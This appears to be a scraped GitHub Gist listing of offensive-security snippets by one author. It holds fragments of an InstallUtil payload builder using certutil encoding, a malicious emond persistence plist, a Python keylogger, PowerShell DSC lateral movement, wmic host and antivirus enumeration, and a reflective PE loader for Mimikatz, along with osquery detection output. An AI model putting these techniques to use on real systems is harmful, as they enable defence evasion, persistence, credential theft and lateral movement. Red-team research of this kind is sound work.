Skip to content

Instantly share code, notes, and snippets.


Chris Ross xorrior

View GitHub Profile
xorrior / messagebox.m
Last active Jul 25, 2019
Installer Plugin that pops a message box to the user
View messagebox.m
// MyInstallerPane.m
// messagebox
// Created by Chris Ross on 1/23/18.
// Copyright © 2018 testplugin. All rights reserved.
This should be in MyInstallerPane.h
xorrior / New-InstallUtilBatchFile.ps1
Created Oct 27, 2016
Generate InstallUtil payload within batch file for delivery
View New-InstallUtilBatchFile.ps1
function New-InstallUtilBatchFile
#You must provide an encoded payload using certutil -encode for the InFilePath.
#certutil -encode payload.exe payload.txt
#For compiling w/ a managed powershell runner
# C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /reference:"C:\Windows\assembly\GAC_MSIL\System.Management.Automation\\System.Management.Automation.dll" /out:payload.exe payload.cs
xorrior / bad.plist
Last active Jan 21, 2020
Example Malicious emond plist
View bad.plist
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "">
<plist version="1.0">
<string>empire rules</string>
xorrior / emond-examples.txt
Last active Jun 1, 2020
fswatch and osquery command syntax w/ output
View emond-examples.txt
Fswatch command
fswatch -r --format="'{\"path\": \"%p\", \"timestamp\":\"%t\", \"flag\": \"%f\"}'" /etc/emond.d/rules/
Output when event is triggered
'{"path": "/private/etc/emond.d/rules/test.plist", "timestamp":"Tue Jan 16 21:17:24 2018", "flag": "PlatformSpecific IsFile"}'
osquery.results.log output from event.
{"name":"file_events","hostIdentifier":"host","calendarTime":"Thu Jan 11 07:00:10 2018 UTC","unixTime":"1515654010","epoch":"0","counter":"0","columns":{"action":"CREATED","atime":"1515653980","category":"emond","ctime":"1515653980","gid":"0","hashed":"1","inode":"1316814","md5":"b1f38ed6d9dca2d33ce733d51617e900","mode":"0644","mtime":"1515653980","sha1":"003a4a25662147ca19692dd01d2d7e06ea751c5e","sha256":"f26ee0eab108d3794426f609ccd878d7a7057e2fab3bea215152e4f35c82b0cf","size":"986","target_path":"\/private\/etc\/emond.d\/rules\/test.plist","time":"1515653983","transaction_id":"2101010","uid":"0"},"action":"added"}
xorrior /
Created Dec 11, 2017
Python on disk keylogger
import zipfile
import io
import sys
import os, imp
import base64
import threading
moduleRepo = {}
_meta_cache = {}
View PowerShellDSCLateralMovement.ps1
# This idea originated from this blog post on Invoke DSC Resources directly:
$MOFContents = @'
instance of MSFT_ScriptResource as $MSFT_ScriptResource1ref
ResourceID = "[Script]ScriptExample";
GetScript = "\"$(Get-Date): I am being GET\" | Out-File C:\\Windows\\Temp\\ScriptRun.txt -Append; return $True";
TestScript = "\"$(Get-Date): I am being TESTED\" | Out-File C:\\Windows\\Temp\\ScriptRun.txt -Append; return $True";
xorrior / wmic_cmds.txt
Last active Feb 19, 2021
Useful Wmic queries for host and domain enumeration
View wmic_cmds.txt
Host Enumeration:
--- OS Specifics ---
wmic os LIST Full (* To obtain the OS Name, use the "caption" property)
wmic computersystem LIST full
--- Anti-Virus ---
wmic /namespace:\\root\securitycenter2 path antivirusproduct
xorrior / PELoader.cs
Created Jul 12, 2017
Reflective PE Loader - Compressed Mimikatz inside of InstallUtil
View PELoader.cs
using System;
using System.IO;
using System.IO.Compression;
using System.Text;
using System.Collections.Generic;
using System.Configuration.Install;
using System.Runtime.InteropServices;